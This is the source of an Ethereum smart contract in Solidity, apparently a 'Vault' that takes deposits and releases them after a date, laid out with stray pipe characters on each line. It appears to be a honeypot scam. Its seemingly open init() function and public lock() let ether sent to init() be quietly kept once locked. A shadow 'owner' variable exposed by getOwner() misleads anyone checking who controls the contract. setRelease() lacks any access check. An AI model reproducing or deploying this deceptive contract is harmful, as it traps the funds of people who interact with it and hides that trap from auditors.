|
|
|
|
|
|
|
|
|
|
|
pragma solidity ^0.4.14; |
|
|
|
contract Ownable { |
|
address Owner = msg.sender; |
|
modifier onlyOwner { if (msg.sender == Owner) _; } |
|
function transferOwnership(address to) public onlyOwner { Owner = to; } |
|
} |
|
|
|
|
|
contract TokenVault is Ownable { |
|
function withdrawTokenTo(address token, address to, uint amount) public onlyOwner returns (bool) { |
|
return token.call(bytes4(0xa9059cbb), to, amount); |
|
} |
|
} |
|
|
|
|
|
contract Vault is TokenVault { |
|
|
|
event Deposit(address indexed depositor, uint amount); |
|
event Withdrawal(address indexed to, uint amount); |
|
event OpenDate(uint date); |
|
|
|
mapping (address => uint) public Deposits; |
|
uint minDeposit; |
|
bool Locked; |
|
uint Date; |
|
|
|
function init() payable open { |
|
Owner = msg.sender; |
|
minDeposit = 0.5 ether; |
|
Locked = false; |
|
deposit(); |
|
} |
|
|
|
function MinimumDeposit() public constant returns (uint) { return minDeposit; } |
|
function ReleaseDate() public constant returns (uint) { return Date; } |
|
function WithdrawEnabled() public constant returns (bool) { return Date > 0 && Date <= now; } |
|
|
|
function() public payable { deposit(); } |
|
|
|
function deposit() public payable { |
|
if (msg.value > 0) { |
|
if (msg.value >= MinimumDeposit()) |
|
Deposits[msg.sender] += msg.value; |
|
Deposit(msg.sender, msg.value); |
|
} |
|
} |
|
|
|
function setRelease(uint newDate) public { |
|
Date = newDate; |
|
OpenDate(Date); |
|
} |
|
|
|
function withdraw(address to, uint amount) public onlyOwner { |
|
if (WithdrawEnabled()) { |
|
uint max = Deposits[msg.sender]; |
|
if (max > 0 && amount <= max) { |
|
to.transfer(amount); |
|
Withdrawal(to, amount); |
|
} |
|
} |
|
} |
|
|
|
function lock() public { Locked = true; } address owner; |
|
modifier open { if (!Locked) _; owner = msg.sender; } |
|
function kill() public { require(this.balance == 0); selfdestruct(Owner); } |
|
function getOwner() external constant returns (address) { return owner; } |
|
} |